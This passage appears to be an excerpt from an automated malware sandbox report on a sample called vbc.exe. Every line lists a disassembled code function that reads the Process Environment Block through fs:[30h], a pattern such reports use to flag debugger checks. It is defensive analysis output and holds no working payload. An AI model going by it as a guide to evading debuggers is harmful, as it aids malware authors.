        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DB944 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015BB171 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015BB171 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015BC962 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B9100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B9100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B9100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E513A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E513A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D4120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D4120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D4120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D4120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D4120 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016441E8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015BB1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015BB1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015BB1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016749A4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016749A4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016749A4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016749A4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016369A6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E2990 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EA185 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016351BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016351BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016351BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016351BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DC182 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D99BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D99BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D99BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D99BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D99BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D99BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D99BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D99BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D99BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D99BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D99BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D99BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E61A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E61A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D0050 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D0050 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01672073 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01681074 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA830 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA830 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA830 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA830 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01637016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01637016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01637016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015CB02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015CB02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015CB02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015CB02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01684015 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01684015 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0164B8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0164B8D0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0164B8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0164B8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0164B8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0164B8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B58EC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DB8E4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DB8E4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B40E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B40E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B40E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B9080 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EF0BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EF0BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EF0BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01633884 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01633884 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F90AF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E20A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E20A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E20A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E20A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E20A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E20A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015BF358 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015BDB40 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E3B7A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E3B7A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01688B58 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015BDB60 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0167131B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016623E3 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016623E3 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016623E3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016353CA mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016353CA mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DDBE9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E03E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E03E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E03E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E03E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E03E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E03E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E2397 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01685BA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EB390 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C1B8F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C1B8F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0166D380 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0167138A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E4BAD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E4BAD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E4BAD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0166B260 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0166B260 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01688A62 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B9240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B9240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B9240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B9240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F927A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0167EA55 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01644257 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D3A1C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B5210 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B5210 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B5210 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B5210 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015BAA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015BAA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C8A0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0167AA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0167AA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F4A2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F4A2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA229 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA229 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA229 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA229 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA229 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA229 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA229 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA229 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA229 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E2ACB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E2AE4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015ED294 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015ED294 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015CAAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015CAAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EFAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B52A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B52A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B52A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B52A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B52A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D7D50 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F3D43 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01633540 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01663D40 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DC577 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DC577 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0163A537 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01688D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0167E539 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E4D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E4D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E4D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015BAD30 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0167FDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0167FDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0167FDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0167FDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01668DF1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01636DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01636DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01636DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01636DC9 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01636DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01636DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015CD5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015CD5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016805AC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016805AC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EFD9B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EFD9B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B2D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B2D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B2D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B2D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B2D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E2581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E2581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E2581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E2581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01672D82 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01672D82 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01672D82 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01672D82 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01672D82 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01672D82 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01672D82 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E1DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E1DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E1DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E35A1 mov eax, dword ptr fs:[00000030h]
